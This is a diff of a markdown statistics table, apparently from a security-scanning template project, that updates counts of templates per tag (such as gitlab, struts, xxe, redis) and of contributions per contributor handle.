| | | | | | | -| redis | 5 | c3l3si4n | 1 | | | | | | | -| elfinder | 5 | exploitation | 1 | | | | | | | -| awstats | 5 | sak1 | 1 | | | | | | | -| filemanager | 5 | becivells | 1 | | | | | | | -| thinkphp | 5 | narluin | 1 | | | | | | | -| keycloak | 5 | skylark-lab | 1 | | | | | | | -| minio | 5 | ahmed abou-ela | 1 | | | | | | | -| 74cms | 5 | yuansec | 1 | | | | | | | -| apisix | 5 | udinchan | 1 | | | | | | | -| database | 5 | nielsing | 1 | | | | | | | -| storage | 5 | xeldax | 1 | | | | | | | -| circarlife | 5 | prettyboyaaditya | 1 | | | | | | | -| cockpit | 5 | evolutionsec | 1 | | | | | | | -| error | 5 | noobexploiter | 1 | | | | | | | -| prestashop | 5 | aringo | 1 | | | | | | | -| plesk | 5 | dievus | 1 | | | | | | | -| metinfo | 5 | ola456 | 1 | | | | | | | -| nagios | 5 | ilovebinbash | 1 | | | | | | | -| parallels | 5 | breno_css | 1 | | | | | | | -| fortios | 5 | jeya.seelan | 1 | | | | | | | -| rfi | 5 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| gogs | 5 | maximus decimus | 1 | | | | | | | -| cache | 5 | ringo | 1 | | | | | | | -| strapi | 5 | af001 | 1 | | | | | | | -| alibaba | 5 | th3.d1p4k | 1 | | | | | | | -| solarwinds | 5 | xstp | 1 | | | | | | | -| gocd | 5 | kurohost | 1 | | | | | | | -| elastic | 5 | kaizensecurity | 1 | | | | | | | -| scan | 5 | d0rkerdevil | 1 | | | | | | | -| leak | 5 | makyotox | 1 | | | | | | | -| firmware | 5 | deena | 1 | | | | | | | -| smtp | 5 | kailashbohara | 1 | | | | | | | -| admin | 5 | rotemreiss | 1 | | | | | | | -| node | 5 | sickwell | 1 | | | | | | | -| kevinlab | 4 | infosecsanyam | 1 | | | | | | | -| voip | 4 | qlkwej | 1 | | | | | | | -| stripe | 4 | bibeksapkota (sar00n) | 1 | | | | | | | -| s3 | 4 | calumjelrick | 1 | | | | | | | -| phpinfo | 4 | ling | 1 | | | | | | | -| sql | 4 | notsoevilweasel | 1 | | | | | | | -| aspose | 4 | daffianfo | 1 | | | | | | | -| panos | 4 | arm!tage | 1 | | | | | | | -| ampache | 4 | ptonewreckin | 1 | | | | | | | -| hikvision | 4 | francescocarlucci | 1 | | | | | | | -| telesquare | 4 | shiar | 1 | | | | | | | -| ems | 4 | 0xrod | 1 | | | | | | | -| mongodb | 4 | aresx | 1 | | | | | | | -| paypal | 4 | rodnt | 1 | | | | | | | -| candidats | 4 | 0xtavian | 1 | | | | | | | -| openemr | 4 | pry0cc | 1 | | | | | | | -| kentico | 4 | evan rubinstien | 1 | | | | | | | -| axigen | 4 | cookiehanhoan | 1 | | | | | | | -| cve2007 | 4 | screamy | 1 | | | | | | | -| puppet | 4 | geraldino2 | 1 | | | | | | | -| oa | 4 | bjhulst | 1 | | | | | | | -| umbraco | 4 | hanlaomo | 1 | | | | | | | -| xmlrpc | 4 | lingtren | 1 | | | | | | | -| cacti | 4 | tehtbl | 1 | | | | | | | -| photo | 4 | akshansh | 1 | | | | | | | -| hybris | 4 | sshell | 1 | | | | | | | -| wcs | 4 | thevillagehacker | 1 | | | | | | | -| couchdb | 4 | arjunchandarana | 1 | | | | | | | -| sophos | 4 | luqmaan hadia | 1 | | | | | | | -| | | [luqiih](https://github.com/luqiih) | | | | | | | | -| artifactory | 4 | dhiyaneshdki | 1 | | | | | | | -| hpe | 4 | ggranjus | 1 | | | | | | | -| linkerd | 4 | andysvints | 1 | | | | | | | -| flink | 4 | alexrydzak | 1 | | | | | | | -| sendgrid | 4 | willd96 | 1 | | | | | | | -| telerik | 4 | amanrawat | 1 | | | | | | | -| postmessage | 4 | revblock | 1 | | | | | | | -| gitea | 4 | flag007 | 1 | | | | | | | -| nexus | 4 | ipanda | 1 | | | | | | | -| nosqli | 4 | apt-mirror | 1 | | | | | | | -| kibana | 4 | notnotnotveg | 1 | | | | | | | -| oauth | 4 | xshuden | 1 | | | | | | | -| caucho | 4 | marcos_iaf | 1 | | | | | | | -| tenda | 4 | jbaines-r7 | 1 | | | | | | | -| hashicorp | 4 | majidmc2 | 1 | | | | | | | -| adminer | 4 | h4kux | 1 | | | | | | | -| jellyfin | 4 | jbertman | 1 | | | | | | | -| terramaster | 4 | affix | 1 | | | | | | | -| sangfor | 4 | mesaglio | 1 | | | | | | | -| zte | 4 | secthebit | 1 | | | | | | | -| roxy | 4 | bad5ect0r | 1 | | | | | | | -| vbulletin | 4 | dawid-czarnecki | 1 | | | | | | | -| beyondtrust | 4 | allenwest24 | 1 | | | | | | | -| thinkcmf | 4 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| mailchimp | 4 | fmunozs | 1 | | | | | | | -| search | 4 | mantissts | 1 | | | | | | | -| bmc | 4 | carlosvieira | 1 | | | | | | | -| hongdian | 4 | osamahamad | 1 | | | | | | | -| resin | 4 | adrianmf | 1 | | | | | | | -| phppgadmin | 4 | aaron_costello | 1 | | | | | | | +| dlink | 18 | h1ei1 | 4 | | | | | | | +| gitlab | 18 | defr0ggy | 4 | | | | | | | +| service | 17 | e_schultze_ | 4 | | | | | | | +| firewall | 17 | its0x08 | 4 | | | | | | | +| wavlink | 17 | robotshell | 4 | | | | | | | +| jenkins | 17 | scent2d | 4 | | | | | | | +| struts | 16 | wisnupramoedya | 4 | | | | | | | +| printer | 16 | 3th1c_yuk1 | 4 | | | | | | | +| ftp | 16 | shine | 3 | | | | | | | +| cve2009 | 15 | mr-xn | 3 | | | | | | | +| xxe | 15 | swissky | 3 | | | | | | | +| cve2011 | 15 | lucasljm2001 | 3 | | | | | | | +| nginx | 15 | z3bd | 3 | | | | | | | +| java | 14 | jarijaas | 3 | | | | | | | +| android | 14 | mavericknerd | 3 | | | | | | | +| hp | 14 | shifacyclewala | 3 | | | | | | | +| fortinet | 14 | johnjhacking | 3 | | | | | | | +| domainmod | 14 | davidmckennirey | 3 | | | | | | | +| lfr | 13 | lark-lab | 3 | | | | | | | +| woocommerce | 13 | ph33r | 3 | | | | | | | +| amazon | 13 | hahwul | 3 | | | | | | | +| magento | 13 | ekrause | 3 | | | | | | | +| cve2013 | 13 | powerexploit | 3 | | | | | | | +| confluence | 13 | skeltavik | 3 | | | | | | | +| msf | 13 | impramodsargar | 3 | | | | | | | +| abstractapi | 13 | yash anand @yashanand155 | 3 | | | | | | | +| status | 13 | me9187 | 3 | | | | | | | +| ruijie | 12 | kh4sh3i | 3 | | | | | | | +| rails | 12 | binaryfigments | 3 | | | | | | | +| netgear | 12 | fxploit | 3 | | | | | | | +| netsweeper | 12 | whoever | 3 | | | | | | | +| cve2008 | 12 | 0w4ys | 3 | | | | | | | +| graphql | 12 | unstabl3 | 3 | | | | | | | +| drupal | 12 | splint3r7 | 3 | | | | | | | +| backup | 12 | fyoorer | 3 | | | | | | | +| microweber | 12 | supras | 3 | | | | | | | +| github | 12 | dudez | 3 | | | | | | | +| vpn | 11 | dr0pd34d | 3 | | | | | | | +| cisa | 11 | sushantkamble | 3 | | | | | | | +| backdoor | 11 | thomas_from_offensity | 3 | | | | | | | +| fortigate | 11 | alifathi-h1 | 3 | | | | | | | +| mail | 11 | andydoering | 3 | | | | | | | +| ssl | 11 | f1tz | 3 | | | | | | | +| azure | 11 | _generic_human_ | 3 | | | | | | | +| airflow | 11 | atomiczsec | 3 | | | | | | | +| webserver | 11 | arcc | 3 | | | | | | | +| cnvd2021 | 11 | yuzhe-zhang-0 | 3 | | | | | | | +| coldfusion | 10 | emenalf | 3 | | | | | | | +| ruby | 10 | kiblyn11 | 2 | | | | | | | +| glpi | 10 | clarkvoss | 2 | | | | | | | +| jolokia | 10 | moritz nentwig | 2 | | | | | | | +| grafana | 10 | sy3omda | 2 | | | | | | | +| zyxel | 10 | vavkamil | 2 | | | | | | | +| spring | 10 | gal nagli | 2 | | | | | | | +| django | 10 | ehsahil | 2 | | | | | | | +| dell | 10 | nuk3s3c | 2 | | | | | | | +| git | 10 | x1m_martijn | 2 | | | | | | | +| laravel | 10 | nvn1729 | 2 | | | | | | | +| fastjson | 9 | geekby | 2 | | | | | | | +| kube | 9 | r12w4n | 2 | | | | | | | +| zabbix | 9 | socketz | 2 | | | | | | | +| phpmyadmin | 9 | fabaff | 2 | | | | | | | +| dedecms | 9 | sbani | 2 | | | | | | | +| ssti | 9 | bananabr | 2 | | | | | | | +| prometheus | 9 | uomogrande | 2 | | | | | | | +| vcenter | 9 | 0xsmiley | 2 | | | | | | | +| windows | 9 | huowuzhao | 2 | | | | | | | +| iis | 9 | udit_thakkur | 2 | | | | | | | +| zimbra | 9 | d4vy | 2 | | | | | | | +| wso2 | 9 | paperpen | 2 | | | | | | | +| sonicwall | 9 | hackerarpan | 2 | | | | | | | +| kafka | 8 | bsysop | 2 | | | | | | | +| config-audit | 8 | redteambrasil | 2 | | | | | | | +| jboss | 8 | 0xsapra | 2 | | | | | | | +| cisco-switch | 8 | n-thumann | 2 | | | | | | | +| mirai | 8 | ambassify | 2 | | | | | | | +| solr | 8 | badboycxcc | 2 | | | | | | | +| recon | 8 | wa1tf0rme | 2 | | | | | | | +| elasticsearch | 8 | 0xrudra | 2 | | | | | | | +| audit | 8 | koti2 | 2 | | | | | | | +| auth | 8 | brenocss | 2 | | | | | | | +| citrix | 8 | github.com/its0x08 | 2 | | | | | | | +| scada | 8 | dbrwsky | 2 | | | | | | | +| solarview | 8 | 0xnirvana | 2 | | | | | | | +| metadata | 8 | cckuakilong | 2 | | | | | | | +| hms | 8 | evergreencartoons | 2 | | | | | | | +| headless | 8 | w4cky_ | 2 | | | | | | | +| blind | 7 | joeldeleep | 2 | | | | | | | +| nodejs | 7 | korteke | 2 | | | | | | | +| samsung | 7 | canberbamber | 2 | | | | | | | +| druid | 7 | convisoappsec | 2 | | | | | | | +| symfony | 7 | vsh00t | 2 | | | | | | | +| go | 7 | joshlarsen | 2 | | | | | | | +| jetbrains | 7 | randomrobbie | 2 | | | | | | | +| seeyon | 7 | z0ne | 2 | | | | | | | +| bucket | 7 | cocxanh | 2 | | | | | | | +| exchange | 7 | danielmofer | 2 | | | | | | | +| icewarp | 7 | zomsop82 | 2 | | | | | | | +| firebase | 7 | bernardofsr | 2 | | | | | | | +| opencats | 7 | raesene | 2 | | | | | | | +| squirrelmail | 7 | ajaysenr | 2 | | | | | | | +| maps | 7 | manas_harsh | 2 | | | | | | | +| detect | 7 | ricardo maia (brainfork) | 2 | | | | | | | +| cnvd2020 | 7 | pxmme1337 | 2 | | | | | | | +| docker | 7 | lotusdll | 2 | | | | | | | +| npm | 7 | dheerajmadhukar | 2 | | | | | | | +| python | 7 | smaranchand | 2 | | | | | | | +| setup | 6 | 8arthur | 2 | | | | | | | +| liferay | 6 | paradessia | 2 | | | | | | | +| moodle | 6 | 0xelkomy | 2 | | | | | | | +| cobbler | 6 | ree4pwn | 2 | | | | | | | +| vms | 6 | amsda | 2 | | | | | | | +| artica | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| ognl | 6 | nkxxkn | 2 | | | | | | | +| emerge | 6 | foulenzer | 2 | | | | | | | +| ssh | 6 | myztique | 2 | | | | | | | +| cache | 6 | kre80r | 2 | | | | | | | +| ofbiz | 6 | 0xcrypto | 2 | | | | | | | +| slack | 6 | dahse89 | 2 | | | | | | | +| activemq | 6 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| crlf | 6 | bing0o | 2 | | | | | | | +| opensis | 6 | bp0lr | 2 | | | | | | | +| rconfig | 6 | afaq | 2 | | | | | | | +| magmi | 6 | israel comazzetto dos reis | 2 | | | | | | | +| lucee | 6 | parth | 2 | | | | | | | +| db | 6 | martincodes-de | 2 | | | | | | | +| sitecore | 6 | taielab | 2 | | | | | | | +| openvpn | 6 | hetroublemakr | 2 | | | | | | | +| microstrategy | 6 | 666asd | 2 | | | | | | | +| bypass | 6 | k11h-de | 2 | | | | | | | +| ecology | 6 | mohammedsaneem | 2 | | | | | | | +| node | 6 | rafaelwdornelas | 2 | | | | | | | +| jamf | 6 | gevakun | 2 | | | | | | | +| zhiyuan | 6 | g4l1t0 | 2 | | | | | | | +| huawei | 6 | v0idc0de | 2 | | | | | | | +| websphere | 6 | thezakman | 2 | | | | | | | +| jetty | 6 | luci | 2 | | | | | | | +| bigip | 6 | true13 | 2 | | | | | | | +| kubelet | 6 | thardt-praetorian | 2 | | | | | | | +| fpd | 6 | codexlynx | 2 | | | | | | | +| enum | 6 | y4er | 2 | | | | | | | +| smtp | 6 | 0xprial | 2 | | | | | | | +| firmware | 5 | _c0wb0y_ | 1 | | | | | | | +| thinkphp | 5 | florianmaak | 1 | | | | | | | +| gocd | 5 | ipanda | 1 | | | | | | | +| awstats | 5 | amanrawat | 1 | | | | | | | +| leak | 5 | ahmetpergamum | 1 | | | | | | | +| cockpit | 5 | absshax | 1 | | | | | | | +| redis | 5 | wlayzz | 1 | | | | | | | +| apisix | 5 | 0xceba | 1 | | | | | | | +| gogs | 5 | sshell | 1 | | | | | | | +| plesk | 5 | flag007 | 1 | | | | | | | +| fatpipe | 5 | sicksec | 1 | | | | | | | +| solarwinds | 5 | _harleo | 1 | | | | | | | +| elfinder | 5 | opencirt | 1 | | | | | | | +| minio | 5 | hakimkt | 1 | | | | | | | +| mongodb | 5 | elder tao | 1 | | | | | | | +| error | 5 | petruknisme | 1 | | | | | | | +| symantec | 5 | lixts | 1 | | | | | | | +| scan | 5 | unkl4b | 1 | | | | | | | +| admin | 5 | aceseven (digisec360) | 1 | | | | | | | +| fortios | 5 | juicypotato1 | 1 | | | | | | | +| alibaba | 5 | makyotox | 1 | | | | | | | +| prestashop | 5 | elmahdi | 1 | | | | | | | +| metinfo | 5 | clment cruchet | 1 | | | | | | | +| carrental | 5 | kareemse1im | 1 | | | | | | | +| keycloak | 5 | thelicato | 1 | | | | | | | +| database | 5 | liquidsec | 1 | | | | | | | +| avideo | 5 | tirtha_mandal | 1 | | | | | | | +| rfi | 5 | iampritam | 1 | | | | | | | +| strapi | 5 | s0obi | 1 | | | | | | | +| elastic | 5 | daviey | 1 | | | | | | | +| nagios | 5 | aaron_costello | 1 | | | | | | | | | | (@conspiracyproof) | | | | | | | | -| springcloud | 4 | regala_ | 1 | | | | | | | -| tikiwiki | 4 | 0xceba | 1 | | | | | | | -| cnvd2019 | 4 | 2rs3c | 1 | | | | | | | -| asp | 4 | aaronchen0 | 1 | | | | | | | -| sonarqube | 4 | duty_1g | 1 | | | | | | | -| horde | 4 | micha3lb3n | 1 | | | | | | | -| prtg | 4 | y0no | 1 | | | | | | | -| hoteldruid | 4 | miroslavsotak | 1 | | | | | | | -| console | 4 | philippdelteil | 1 | | | | | | | -| yeswiki | 4 | udyz | 1 | | | | | | | -| vrealize | 4 | clment cruchet | 1 | | | | | | | -| redmine | 4 | erethon | 1 | | | | | | | -| royalevent | 4 | bartu utku sarp | 1 | | | | | | | -| gnuboard | 4 | 0xd0ff9 | 1 | | | | | | | -| sugarcrm | 3 | b4uh0lz | 1 | | | | | | | -| subrion | 3 | yashanand155 | 1 | | | | | | | -| lansweeper | 3 | nagli | 1 | | | | | | | -| heroku | 3 | mass0ma | 1 | | | | | | | -| graph | 3 | 1nf1n7y | 1 | | | | | | | -| cloudflare | 3 | wabafet | 1 | | | | | | | -| ansible | 3 | patralos | 1 | | | | | | | -| digitalrebar | 3 | tim_koopmans | 1 | | | | | | | -| splunk | 3 | husain | 1 | | | | | | | -| labkey | 3 | 5up3r541y4n | 1 | | | | | | | -| weiphp | 3 | wlayzz | 1 | | | | | | | -| dolibarr | 3 | b0rn2r00t | 1 | | | | | | | -| redash | 3 | lrtk-coder | 1 | | | | | | | -| wordfence | 3 | httpvoid | 1 | | | | | | | -| modem | 3 | soyelmago | 1 | | | | | | | -| pfsense | 3 | j3ssie/geraldino2 | 1 | | | | | | | -| drawio | 3 | nytr0gen | 1 | | | | | | | -| concrete | 3 | hardik-rathod | 1 | | | | | | | -| matrix | 3 | exid | 1 | | | | | | | -| ivanti | 3 | thesubtlety | 1 | | | | | | | -| glassfish | 3 | ahmed sherif | 1 | | | | | | | -| globalprotect | 3 | push4d | 1 | | | | | | | -| panabit | 3 | noamrathaus | 1 | | | | | | | -| square | 3 | piyushchhiroliya | 1 | | | | | | | -| netlify | 3 | harshinsecurity | 1 | | | | | | | -| linksys | 3 | ramkrishna sawant | 1 | | | | | | | -| jeesns | 3 | rojanrijal | 1 | | | | | | | -| voipmonitor | 3 | noraj | 1 | | | | | | | -| express | 3 | act1on3 | 1 | | | | | | | -| httpbin | 3 | djoevanka | 1 | | | | | | | -| steve | 3 | zinminphy0 | 1 | | | | | | | -| fanruan | 3 | shifacyclewla | 1 | | | | | | | -| typo3 | 3 | igibanez | 1 | | | | | | | -| ampps | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| proftpd | 3 | remonsec | 1 | | | | | | | -| centos | 3 | vzamanillo | 1 | | | | | | | -| mongo | 3 | luskabol | 1 | | | | | | | -| hsphere | 3 | lixts | 1 | | | | | | | -| geoserver | 3 | _c0wb0y_ | 1 | | | | | | | -| nuuo | 3 | 0h1in9e | 1 | | | | | | | -| bigant | 3 | juicypotato1 | 1 | | | | | | | -| sentry | 3 | amnotacat | 1 | | | | | | | -| geowebserver | 3 | 8authur | 1 | | | | | | | -| mcafee | 3 | anon-artist | 1 | | | | | | | -| movable | 3 | p-l- | 1 | | | | | | | -| pentaho | 3 | retr02332 | 1 | | | | | | | -| fuelcms | 3 | undefl0w | 1 | | | | | | | -| axis | 3 | daviey | 1 | | | | | | | -| jfrog | 3 | jrolf | 1 | | | | | | | -| technology | 3 | iphantasmic | 1 | | | | | | | -| pip | 3 | absshax | 1 | | | | | | | -| webmin | 3 | nobody | 1 | | | | | | | -| webadmin | 3 | un-fmunozs | 1 | | | | | | | -| seagate | 3 | aayush vishnoi | 1 | | | | | | | -| unifi | 3 | lamscun | 1 | | | | | | | -| rocketchat | 3 | fopina | 1 | | | | | | | -| elementor | 3 | alperenkesk | 1 | | | | | | | -| epson | 3 | ofjaaah | 1 | | | | | | | -| nortek | 3 | kiransau | 1 | | | | | | | -| digitalocean | 3 | f1she3 | 1 | | | | | | | -| webmail | 3 | viniciuspereiras | 1 | | | | | | | -| servicenow | 3 | elitebaz | 1 | | | | | | | -| rlm | 3 | 0ut0fb4nd | 1 | | | | | | | -| ec2 | 3 | kiks7 | 1 | | | | | | | -| bruteforce | 3 | streetofhackerr007 | 1 | | | | | | | -| blockchain | 3 | rschio | 1 | | | | | | | -| octobercms | 3 | andirrahmani1 | 1 | | | | | | | -| nacos | 3 | borna nematzadeh | 1 | | | | | | | -| targa | 3 | remi gascou (podalirius) | 1 | | | | | | | -| zeroshell | 3 | justmumu | 1 | | | | | | | -| grav | 3 | phyr3wall | 1 | | | | | | | -| 3cx | 3 | sherlocksecurity | 1 | | | | | | | -| ebs | 3 | opencirt | 1 | | | | | | | -| httpserver | 3 | berkdusunur | 1 | | | | | | | -| consul | 3 | furkansayim | 1 | | | | | | | -| jupyter | 3 | jcockhren | 1 | | | | | | | -| mobileiron | 3 | pratik khalane | 1 | | | | | | | -| fileman | 3 | intx0x80 | 1 | | | | | | | -| facebook | 3 | liquidsec | 1 | | | | | | | -| odoo | 3 | fq_hsu | 1 | | | | | | | -| openam | 3 | luqmaan hadia | 1 | | | | | | | -| detect | 3 | brabbit10 | 1 | | | | | | | -| rackn | 3 | 0xelkomy & c0nqr0r | 1 | | | | | | | -| dotcms | 3 | hexcat | 1 | | | | | | | -| cve2005 | 3 | shockwave | 1 | | | | | | | -| qnap | 3 | zsusac | 1 | | | | | | | -| axis2 | 3 | j33n1k4 | 1 | | | | | | | -| codeigniter | 3 | elder tao | 1 | | | | | | | -| actuator | 3 | kr1shna4garwal | 1 | | | | | | | -| dreambox | 3 | thelicato | 1 | | | | | | | -| getsimple | 3 | knassar702 | 1 | | | | | | | -| bitbucket | 3 | toufik-airane | 1 | | | | | | | -| key | 3 | vinit989 | 1 | | | | | | | -| graylog | 3 | zhenwarx | 1 | | | | | | | -| aptus | 3 | official_blackhat13 | 1 | | | | | | | -| sharepoint | 3 | tirtha_mandal | 1 | | | | | | | -| log | 3 | luqman | 1 | | | | | | | -| openbmcs | 3 | ransomsec | 1 | | | | | | | -| teamcity | 3 | theabhinavgaur | 1 | | | | | | | -| kingsoft | 3 | pjborah | 1 | | | | | | | -| trendnet | 3 | ratnadip gajbhiye | 1 | | | | | | | -| mautic | 3 | bughuntersurya | 1 | | | | | | | -| empirecms | 3 | ohlinge | 1 | | | | | | | -| harbor | 3 | co0nan | 1 | | | | | | | -| messaging | 3 | shreyapohekar | 1 | | | | | | | -| finecms | 3 | petruknisme | 1 | | | | | | | -| kfm | 3 | elmahdi | 1 | | | | | | | -| bitrix | 3 | hakluke | 1 | | | | | | | -| circleci | 3 | pdp | 1 | | | | | | | -| mantisbt | 3 | tirtha | 1 | | | | | | | -| lotus | 3 | matthew nickerson (b0than) @ | 1 | | | | | | | -| | | layer 8 security | | | | | | | | -| intercom | 3 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| microfocus | 3 | viondexd | 1 | | | | | | | -| avtech | 3 | rotembar | 1 | | | | | | | -| kkfileview | 3 | bernardo rodrigues | 1 | | | | | | | +| rseenet | 5 | aresx | 1 | | | | | | | +| filemanager | 5 | _darrenmartyn | 1 | | | | | | | +| storage | 5 | 0xrod | 1 | | | | | | | +| 74cms | 5 | evolutionsec | 1 | | | | | | | +| parallels | 5 | micha3lb3n | 1 | | | | | | | +| circarlife | 5 | kba@sogeti_esec | 1 | | | | | | | +| paypal | 4 | jeya.seelan | 1 | | | | | | | +| voip | 4 | vzamanillo | 1 | | | | | | | +| hashicorp | 4 | andirrahmani1 | 1 | | | | | | | +| vrealize | 4 | d0rkerdevil | 1 | | | | | | | +| horde | 4 | 2rs3c | 1 | | | | | | | +| sophos | 4 | mrcl0wnlab | 1 | | | | | | | +| sangfor | 4 | bibeksapkota (sar00n) | 1 | | | | | | | +| panos | 4 | udinchan | 1 | | | | | | | +| gitea | 4 | 0xteles | 1 | | | | | | | +| nexus | 4 | jiheon-dev | 1 | | | | | | | +| nosqli | 4 | breno_css | 1 | | | | | | | +| sql | 4 | tea | 1 | | | | | | | +| wcs | 4 | 0xceeb | 1 | | | | | | | +| hpe | 4 | apt-mirror | 1 | | | | | | | +| candidats | 4 | x6263 | 1 | | | | | | | +| kibana | 4 | ramkrishna sawant | 1 | | | | | | | +| prtg | 4 | fmunozs | 1 | | | | | | | +| phppgadmin | 4 | rojanrijal | 1 | | | | | | | +| console | 4 | berkdusunur | 1 | | | | | | | +| hikvision | 4 | b0rn2r00t | 1 | | | | | | | +| axigen | 4 | ahmed abou-ela | 1 | | | | | | | +| adminer | 4 | nytr0gen | 1 | | | | | | | +| beyondtrust | 4 | remi gascou (podalirius) | 1 | | | | | | | +| cve2007 | 4 | af001 | 1 | | | | | | | +| redmine | 4 | 0h1in9e | 1 | | | | | | | +| phpinfo | 4 | revblock | 1 | | | | | | | +| oauth | 4 | aringo | 1 | | | | | | | +| ems | 4 | furkansenan | 1 | | | | | | | +| s3 | 4 | iphantasmic | 1 | | | | | | | +| resin | 4 | yavolo | 1 | | | | | | | +| zte | 4 | francescocarlucci | 1 | | | | | | | +| terramaster | 4 | patralos | 1 | | | | | | | +| royalevent | 4 | pjborah | 1 | | | | | | | +| vbulletin | 4 | ph33rr | 1 | | | | | | | +| hoteldruid | 4 | schniggie | 1 | | | | | | | +| yeswiki | 4 | qlkwej | 1 | | | | | | | +| sonarqube | 4 | furkansayim | 1 | | | | | | | +| ampache | 4 | maximus decimus | 1 | | | | | | | +| telerik | 4 | soyelmago | 1 | | | | | | | +| springcloud | 4 | exploitation | 1 | | | | | | | +| hongdian | 4 | ilovebinbash | 1 | | | | | | | +| gnuboard | 4 | dale clarke | 1 | | | | | | | +| kentico | 4 | sak1 | 1 | | | | | | | +| tikiwiki | 4 | prettyboyaaditya | 1 | | | | | | | +| oa | 4 | djoevanka | 1 | | | | | | | +| kevinlab | 4 | co0nan | 1 | | | | | | | +| postmessage | 4 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| buffalo | 3 | manuelbua | 1 | | | | | | | -| openfire | 3 | pudsec | 1 | | | | | | | -| tableau | 3 | mhdsamx | 1 | | | | | | | -| dom | 3 | jna1 | 1 | | | | | | | -| yonyou | 3 | rubina119 | 1 | | | | | | | -| ruckus | 3 | realexp3rt | 1 | | | | | | | -| samba | 3 | ldionmarcil | 1 | | | | | | | -| metabase | 3 | dale clarke | 1 | | | | | | | -| trixbox | 3 | manasmbellani | 1 | | | | | | | -| netdata | 3 | mah3sec_ | 1 | | | | | | | -| dzzoffice | 3 | x6263 | 1 | | | | | | | -| thruk | 3 | open-sec | 1 | | | | | | | -| processwire | 3 | lark lab | 1 | | | | | | | -| thinfinity | 3 | thebinitghimire | 1 | | | | | | | -| smb | 3 | yashgoti | 1 | | | | | | | -| goanywhere | 3 | arall | 1 | | | | | | | -| zend | 3 | droberson | 1 | | | | | | | -| rabbitmq | 3 | failopen | 1 | | | | | | | -| selea | 3 | 0xceeb | 1 | | | | | | | -| r-seenet | 3 | sinkettu | 1 | | | | | | | -| httpd | 3 | unkl4b | 1 | | | | | | | -| synology | 3 | pascalheidmann | 1 | | | | | | | -| gradle | 2 | charanrayudu | 1 | | | | | | | -| secret | 2 | mubassirpatel | 1 | | | | | | | -| flatpress | 2 | oscarintherocks | 1 | | | | | | | -| workspaceone | 2 | kareemse1im | 1 | | | | | | | -| zzcms | 2 | miryangjung | 1 | | | | | | | -| netscaler | 2 | exceed | 1 | | | | | | | -| exacqvision | 2 | gboddin | 1 | | | | | | | -| eris | 2 | 0xteles | 1 | | | | | | | -| lantronix | 2 | jeya seelan | 1 | | | | | | | -| dvwa | 2 | arr0way | 1 | | | | | | | -| ubnt | 2 | _harleo | 1 | | | | | | | -| code42 | 2 | furkansenan | 1 | | | | | | | -| viewpoint | 2 | florianmaak | 1 | | | | | | | -| neos | 2 | kba@sogeti_esec | 1 | | | | | | | -| maian | 2 | alevsk | 1 | | | | | | | -| backups | 2 | lethargynavigator | 1 | | | | | | | -| pascom | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| akkadian | 2 | ahmetpergamum | 1 | | | | | | | -| text | 2 | ok_bye_now | 1 | | | | | | | -| emby | 2 | davidfegyver | 1 | | | | | | | -| servicedesk | 2 | coldfish | 1 | | | | | | | -| jmx | 2 | couskito | 1 | | | | | | | -| kong | 2 | tea | 1 | | | | | | | -| eko | 2 | kabirsuda | 1 | | | | | | | -| jeedom | 2 | 0xh7ml | 1 | | | | | | | -| pcoip | 2 | retr0 | 1 | | | | | | | -| zms | 2 | elouhi | 1 | | | | | | | -| ucmdb | 2 | sec_hawk | 1 | | | | | | | -| swagger | 2 | ooooooo_q | 1 | | | | | | | -| novnc | 2 | zandros0 | 1 | | | | | | | -| omnia | 2 | mrcl0wnlab | 1 | | | | | | | -| payara | 2 | higor melgaço (eremit4) | 1 | | | | | | | -| chiyu | 2 | chron0x | 1 | | | | | | | -| saltstack | 2 | shivampand3y | 1 | | | | | | | -| checkpoint | 2 | paper-pen | 1 | | | | | | | -| cve2006 | 2 | izn0u | 1 | | | | | | | -| gryphon | 2 | whynotke | 1 | | | | | | | -| pega | 2 | omarkurt | 1 | | | | | | | -| yapi | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| terraform | 2 | nerrorsec | 1 | | | | | | | -| arcgis | 2 | bywalks | 1 | | | | | | | -| commax | 2 | iampritam | 1 | | | | | | | -| virtua | 2 | schniggie | 1 | | | | | | | -| metersphere | 2 | jas37 | 1 | | | | | | | -| ispy | 2 | shelld3v | 1 | | | | | | | -| airtame | 2 | alex | 1 | | | | | | | -| angular | 2 | bernardo rodrigues | 1 | | | | | | | +| flink | 4 | luskabol | 1 | | | | | | | +| cacti | 4 | gboddin | 1 | | | | | | | +| hybris | 4 | ahmed sherif | 1 | | | | | | | +| roxy | 4 | evan rubinstien | 1 | | | | | | | +| puppet | 4 | b4uh0lz | 1 | | | | | | | +| mailchimp | 4 | kabirsuda | 1 | | | | | | | +| cnvd2019 | 4 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| artifactory | 4 | jbaines-r7 | 1 | | | | | | | +| aspose | 4 | un-fmunozs | 1 | | | | | | | +| thinkcmf | 4 | noraj | 1 | | | | | | | +| search | 4 | aaronchen0 | 1 | | | | | | | +| umbraco | 4 | luqmaan hadia | 1 | | | | | | | +| | | [luqiih](https://github.com/luqiih) | | | | | | | | +| openemr | 4 | natto97 | 1 | | | | | | | +| asp | 4 | shelld3v | 1 | | | | | | | +| xmlrpc | 4 | xshuden | 1 | | | | | | | +| typo3 | 4 | intx0x80 | 1 | | | | | | | +| tenda | 4 | becivells | 1 | | | | | | | +| couchdb | 4 | luqman | 1 | | | | | | | +| sendgrid | 4 | shreyapohekar | 1 | | | | | | | +| linkerd | 4 | f1she3 | 1 | | | | | | | +| caucho | 4 | kailashbohara | 1 | | | | | | | +| stripe | 4 | toufik-airane | 1 | | | | | | | +| jellyfin | 4 | affix | 1 | | | | | | | +| telesquare | 4 | j33n1k4 | 1 | | | | | | | +| photo | 4 | bywalks | 1 | | | | | | | +| bmc | 4 | tehtbl | 1 | | | | | | | +| rabbitmq | 3 | jas37 | 1 | | | | | | | +| webadmin | 3 | lamscun | 1 | | | | | | | +| smb | 3 | noobexploiter | 1 | | | | | | | +| lansweeper | 3 | jrolf | 1 | | | | | | | +| goanywhere | 3 | yashanand155 | 1 | | | | | | | 